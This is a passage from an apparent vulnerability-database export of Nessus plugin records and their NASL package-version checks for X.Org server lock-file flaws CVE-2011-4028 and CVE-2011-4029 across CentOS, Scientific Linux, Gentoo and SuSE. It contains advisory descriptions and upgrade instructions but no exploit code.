If you see this test, your display server is\nbroken and you should notify your distributor.' could be displayed\nafter resuming the system or re-enabling the display, and included a\nURL to an external web page. This update removes this message.\n(BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the\nXephyr server disabled screens on a screen crossing event. The focus\nwas only on the screen where the mouse was located and only this\nscreen was updated when the Xephyr nested X server was configured in a\nmulti-screen setup. This update removes this code and Xephyr now\ncorrectly updates screens in multi-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis\nvalues. As a consequence, clients which relied on relative values for\nfunctioning did not behave as expected. This update sets the values to\nthe original driver values instead of the already transformed values.\nNow, raw events contain relative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. 
All running X.Org server\ninstances must be restarted for this update to take effect.", "edition": 25, "published": "2012-07-11T00:00:00", "title": "CentOS 6 : xorg-x11-server (CESA-2012:0939)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2012-07-11T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:xorg-x11-server-Xvfb", "p-cpe:/a:centos:centos:xorg-x11-server-Xnest", "p-cpe:/a:centos:centos:xorg-x11-server-common", "p-cpe:/a:centos:centos:xorg-x11-server-Xdmx", "p-cpe:/a:centos:centos:xorg-x11-server-devel", "p-cpe:/a:centos:centos:xorg-x11-server-Xorg", "p-cpe:/a:centos:centos:xorg-x11-server-source", "p-cpe:/a:centos:centos:xorg-x11-server-Xephyr"], "id": "CENTOS_RHSA-2012-0939.NASL", "href": "https://www.tenable.com/plugins/nessus/59932", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0939 and \n# CentOS Errata and Security Advisory 2012:0939 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59932);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_bugtraq_id(50193, 50196);\n script_xref(name:\"RHSA\", value:\"2012:0939\");\n\n script_name(english:\"CentOS 6 : xorg-x11-server (CESA-2012:0939)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated xorg-x11-server packages that fix two security issues and\nseveral bugs are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has 
rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nX.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs :\n\n* Prior to this update, the KDE Display Manager (KDM) could pass\ninvalid 24bpp pixmap formats to the X server. As a consequence, the X\nserver could unexpectedly abort. This update modifies the underlying\ncode to pass the correct formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or\nbottom-most screen if the X server was configured as a multi-screen\nsetup through multiple 'Device' sections in the xorg.conf file. This\nupdate changes the screen crossing behavior so that absolute devices\nare always mapped across all screens. (BZ#732467)\n\n* Prior to this update, the misleading message 'Session active, not\ninhibited, screen idle. If you see this test, your display server is\nbroken and you should notify your distributor.' 
could be displayed\nafter resuming the system or re-enabling the display, and included a\nURL to an external web page. This update removes this message.\n(BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the\nXephyr server disabled screens on a screen crossing event. The focus\nwas only on the screen where the mouse was located and only this\nscreen was updated when the Xephyr nested X server was configured in a\nmulti-screen setup. This update removes this code and Xephyr now\ncorrectly updates screens in multi-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis\nvalues. As a consequence, clients which relied on relative values for\nfunctioning did not behave as expected. This update sets the values to\nthe original driver values instead of the already transformed values.\nNow, raw events contain relative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. 
All running X.Org server\ninstances must be restarted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-July/018722.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c991279d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xorg-x11-server packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-4029\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-Xdmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-Xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/11\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-Xdmx-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-Xnest-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-Xorg-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-common-1.10.6-1.el6.centos\")) flag++;\nif 
(rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-devel-1.10.6-1.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"xorg-x11-server-source-1.10.6-1.el6.centos\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc\");\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T13:46:42", "description": "X.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nThis update also fixes the following bugs :\n\n - Prior to this update, the KDE Display Manager (KDM)\n could pass invalid 24bpp pixmap formats to the X server.\n As a consequence, the X server could unexpectedly abort.\n This update modifies the underlying code to pass the\n correct formats.\n\n - Prior to this update, absolute input devices, like the\n stylus of a graphic tablet, could become unresponsive in\n the right-most or bottom-most screen if the X server was\n configured as a multi-screen setup through multiple\n 'Device' sections in the xorg.conf file. 
This update\n changes the screen crossing behavior so that absolute\n devices are always mapped across all screens.\n\n - Prior to this update, the misleading message 'Session\n active, not inhibited, screen idle. If you see this\n test, your display server is broken and you should\n notify your distributor.' could be displayed after\n resuming the system or re-enabling the display, and\n included a URL to an external web page. This update\n removes this message.\n\n - Prior to this update, the erroneous input handling code\n of the Xephyr server disabled screens on a screen\n crossing event. The focus was only on the screen where\n the mouse was located and only this screen was updated\n when the Xephyr nested X server was configured in a\n multi-screen setup. This update removes this code and\n Xephyr now correctly updates screens in multi-screen\n setups.\n\n - Prior to this update, raw events did not contain\n relative axis values. As a consequence, clients which\n relied on relative values for functioning did not behave\n as expected. This update sets the values to the original\n driver values instead of the already transformed values.\n Now, raw events contain relative axis values as\n expected.\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. 
All running X.Org server\ninstances must be restarted for this update to take effect.", "edition": 16, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : xorg-x11-server on SL6.x i386/x86_64 (20120620)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2012-08-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xnest", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-source", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-debuginfo", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xephyr", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-devel", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xvfb", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xdmx", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xorg", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-common"], "id": "SL_20120620_XORG_X11_SERVER_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61351", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61351);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n\n script_name(english:\"Scientific Linux Security Update : xorg-x11-server on SL6.x i386/x86_64 (20120620)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"X.Org is an open source implementation of the X Window System. 
It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nThis update also fixes the following bugs :\n\n - Prior to this update, the KDE Display Manager (KDM)\n could pass invalid 24bpp pixmap formats to the X server.\n As a consequence, the X server could unexpectedly abort.\n This update modifies the underlying code to pass the\n correct formats.\n\n - Prior to this update, absolute input devices, like the\n stylus of a graphic tablet, could become unresponsive in\n the right-most or bottom-most screen if the X server was\n configured as a multi-screen setup through multiple\n 'Device' sections in the xorg.conf file. This update\n changes the screen crossing behavior so that absolute\n devices are always mapped across all screens.\n\n - Prior to this update, the misleading message 'Session\n active, not inhibited, screen idle. If you see this\n test, your display server is broken and you should\n notify your distributor.' could be displayed after\n resuming the system or re-enabling the display, and\n included a URL to an external web page. This update\n removes this message.\n\n - Prior to this update, the erroneous input handling code\n of the Xephyr server disabled screens on a screen\n crossing event. 
The focus was only on the screen where\n the mouse was located and only this screen was updated\n when the Xephyr nested X server was configured in a\n multi-screen setup. This update removes this code and\n Xephyr now correctly updates screens in multi-screen\n setups.\n\n - Prior to this update, raw events did not contain\n relative axis values. As a consequence, clients which\n relied on relative values for functioning did not behave\n as expected. This update sets the values to the original\n driver values instead of the already transformed values.\n Now, raw events contain relative axis values as\n expected.\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server\ninstances must be restarted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1207&L=scientific-linux-errata&T=0&P=1915\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d8997fc7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xdmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-Xdmx-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-Xnest-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-Xorg-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-common-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-debuginfo-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-devel-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-source-1.10.6-1.sl6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc\");\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:52:52", "description": "The remote host is affected by the vulnerability described in GLSA-201110-19\n(X.Org X Server: Multiple vulnerabilities)\n\n vladz reported the following vulnerabilities in the X.Org X server:\n The X.Org X server follows symbolic links when trying to access the\n lock file for a X display, showing a 
predictable behavior depending on\n the file type of the link target (CVE-2011-4028).\n The X.Org X server lock file mechanism allows for a race condition to\n cause the X server to modify the file permissions of an arbitrary file\n to 0444 (CVE-2011-4029).\n \nImpact :\n\n A local attacker could exploit these vulnerabilities to disclose\n information by making arbitrary files on a system world-readable or gain\n information whether a specified file exists on the system and whether it\n is a file, directory, or a named pipe.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 21, "published": "2011-10-24T00:00:00", "title": "GLSA-201110-19 : X.Org X Server: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2011-10-24T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:xorg-server"], "id": "GENTOO_GLSA-201110-19.NASL", "href": "https://www.tenable.com/plugins/nessus/56594", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201110-19.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56594);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_xref(name:\"GLSA\", value:\"201110-19\");\n\n script_name(english:\"GLSA-201110-19 : X.Org X Server: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201110-19\n(X.Org X Server: Multiple vulnerabilities)\n\n vladz reported the following vulnerabilities in the X.Org X server:\n The X.Org X server follows symbolic links when trying to access the\n lock file for a X display, showing a predictable behavior depending on\n the file type of the link target (CVE-2011-4028).\n The X.Org X server lock file mechanism allows for a race condition to\n cause the X server to modify the file permissions of an arbitrary file\n to 0444 (CVE-2011-4029).\n \nImpact :\n\n A local attacker could exploit these vulnerabilities to disclose\n information by making arbitrary files on a system world-readable or gain\n information whether a specified file exists on the system and whether it\n is a file, directory, or a named pipe.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201110-19\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All X.Org X Server 1.9 users should upgrade to the latest 1.9 version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-base/xorg-server-1.9.5-r1'\n 
All X.Org X Server 1.10 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-base/xorg-server-1.10.4-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xorg-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"x11-base/xorg-server\", unaffected:make_list(\"rge 1.9.5-r1\", \"ge 1.10.4-r1\"), vulnerable:make_list(\"lt 1.10.4-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:qpkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, 
tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"X.Org X Server\");\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-20T14:42:02", "description": "This update fixes two security issues with the X server :\n\n - A local attacker could find out if a file exists by\n exploiting the way that Xorg creates its lock files.\n (CVE-2011-4028)\n\n - A non-root local user could set the read permission for\n all users on any file or directory. (CVE-2011-4029)", "edition": 23, "published": "2011-12-13T00:00:00", "title": "SuSE 11.1 Security Update : xorg-x11-server (SAT Patch Number 5479)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2011-12-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:xorg-x11-server-extra", "p-cpe:/a:novell:suse_linux:11:xorg-x11-server", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:xorg-x11-Xvnc"], "id": "SUSE_11_XORG-X11-XVNC-111124.NASL", "href": "https://www.tenable.com/plugins/nessus/57138", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57138);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n\n script_name(english:\"SuSE 11.1 Security Update : xorg-x11-server (SAT Patch Number 5479)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes two security issues with the X server :\n\n - A local attacker could find out if a file exists by\n exploiting the way that Xorg creates its lock files.\n (CVE-2011-4028)\n\n - A non-root local user could set the read permission for\n all users on any file or directory. 
(CVE-2011-4029)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4029.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 5479.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xorg-x11-Xvnc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xorg-x11-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xorg-x11-server-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 